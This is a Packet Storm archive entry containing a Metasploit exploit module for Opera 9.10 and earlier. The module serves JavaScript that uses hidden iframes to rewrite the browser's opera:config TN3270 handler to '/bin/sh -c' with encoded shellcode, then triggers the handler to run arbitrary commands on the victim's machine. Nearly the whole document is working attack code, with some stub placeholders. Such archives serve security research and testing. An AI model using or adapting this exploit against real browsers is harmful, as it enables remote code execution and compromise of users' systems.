Opera 9 Configuration Overwrite

2009-10-27T00:00:00
ID PACKETSTORM:82263
Type packetstorm
Reporter Packet Storm
Modified 2009-10-27T00:00:00

Description

                                        
                                            `##  
# $Id$  
##  
  
##  
# This file is part of the Metasploit Framework and may be subject to   
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/  
##  
  
  
require 'msf/core'  
  
  
class Metasploit3 < Msf::Exploit::Remote  
  
#  
# This module acts as an HTTP server  
#  
include Msf::Exploit::Remote::HttpServer::HTML  
  
include Msf::Exploit::Remote::BrowserAutopwn  
autopwn_info({  
:ua_name => HttpClients::OPERA,  
:ua_ver => "1.0",  
:os_name => [ OperatingSystems::WINDOWS, OperatingSystems::LINUX ],  
:javascript => true,  
:rank => ExcellentRanking, # reliable exe writer  
:vuln_test => nil,  
})  
  
def initialize(info = {})  
super(update_info(info,{  
'Name' => 'Opera 9 Configuration Overwrite',  
'Description' => %q{  
Opera web browser in versions <= 9.10 allows unrestricted script  
access to its configuration page, opera:config, allowing an  
attacker to change settings and potentially execute arbitrary  
code.  
},  
'License' => BSD_LICENSE,  
'Author' =>  
[  
'egypt', # stolen from mpack  
],  
'Version' => '$Revision: 6655 $',  
'References' => [ ],  
'Payload' =>  
{  
'ExitFunc' => 'process',  
'Space' => 2048,  
'DisableNops' => true,  
'BadChars' => " |'<>&",  
},  
'Targets' =>  
[  
#[ 'Opera < 9.10 Windows',   
# {  
# 'Platform' => 'win',  
# 'Arch' => ARCH_X86,  
# }  
#],  
[ 'Opera < 9.10 Unix Cmd',   
{  
'Platform' => 'unix',  
'Arch' => ARCH_CMD,  
}  
],  
],  
# Not sure when this was disclosed but it's been known since at  
# least March 5, 2007, since that's the release date on the version  
# of mpack I stole this from.  
'DisclosureDate' => 'Mar 5 2007'  
}))  
end  
  
def on_request_uri(cli, request)  
  
case request.uri  
when /payload$/  
print_status("Generating payload for #{target} #{target.platform}")  
# Re-generate the payload  
if ((p = regenerate_payload(cli)) == nil)  
print_error("Payload generation failed, 404ing request for #{request.uri}")  
send_not_found(cli)  
return  
end  
# NOTE: Change this to the new API when commiting to trunk  
#content = Msf::Util::EXE.to_win32pe(p.encoded)  
#content = Rex::Text.to_win32pe(p.encoded)  
content = "foo"  
print_status("Generated #{content.length} bytes")  
headers = { 'Content-Type' => 'application/octet-stream' }  
when get_resource  
print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")  
content = "<body><script>"  
content << generate_evil_js(cli, request)  
content << "</script></body>"  
headers = { 'Content-Type' => 'text/html' }  
else  
print_status("404ing request for #{request.uri}")  
send_not_found(cli)  
return  
end  
send_response_html(cli, content, headers)  
  
end  
  
def generate_evil_js(cli, request)  
# There are a bunch of levels of quotes here, so the easiest way to  
# make everything line up is to hex escape the command to run  
p = regenerate_payload(cli).encoded  
#print_status(p)  
shellcode = Rex::Text.to_hex(p, "%")  
js = <<ENDJS  
blank_iframe = document.createElement('iframe');  
blank_iframe.src = 'about:blank';  
blank_iframe.setAttribute('id', 'blank_iframe_window');  
blank_iframe.setAttribute('style', 'display:none');  
document.body.appendChild(blank_iframe);  
blank_iframe_window.eval(  
"config_iframe = document.createElement('iframe');" +  
"config_iframe.setAttribute('id', 'config_iframe_window');" +  
"config_iframe.src = 'opera:config';" +  
"document.body.appendChild(config_iframe);" +  
"cache_iframe = document.createElement('iframe');" +  
"cache_iframe.src = 'opera:cache';" +  
"cache_iframe.onload = function ()" +  
"{" +  
" config_iframe_window.eval" +  
" (\\"" +  
" old_handler = opera.getPreference('Network','TN3270 App');" +  
" shellcode = '#{shellcode}';" +  
" opera.setPreference('Network','TN3270 App','/bin/sh -c ' + unescape(shellcode));" +  
" app_link = document.createElement('a');" +  
" app_link.setAttribute('href', 'tn3270://#{Rex::Text.rand_text_alpha(rand(5)+5)}');" +  
" app_link.click();" +  
" setTimeout(function () {opera.setPreference('Network','TN3270 App',old_handler)},1000);" +  
" \\");" +  
"};" +  
"document.body.appendChild(cache_iframe);" +  
"");  
ENDJS  
  
end  
  
def generate_evil_preference()  
  
end  
  
end  
  
  
`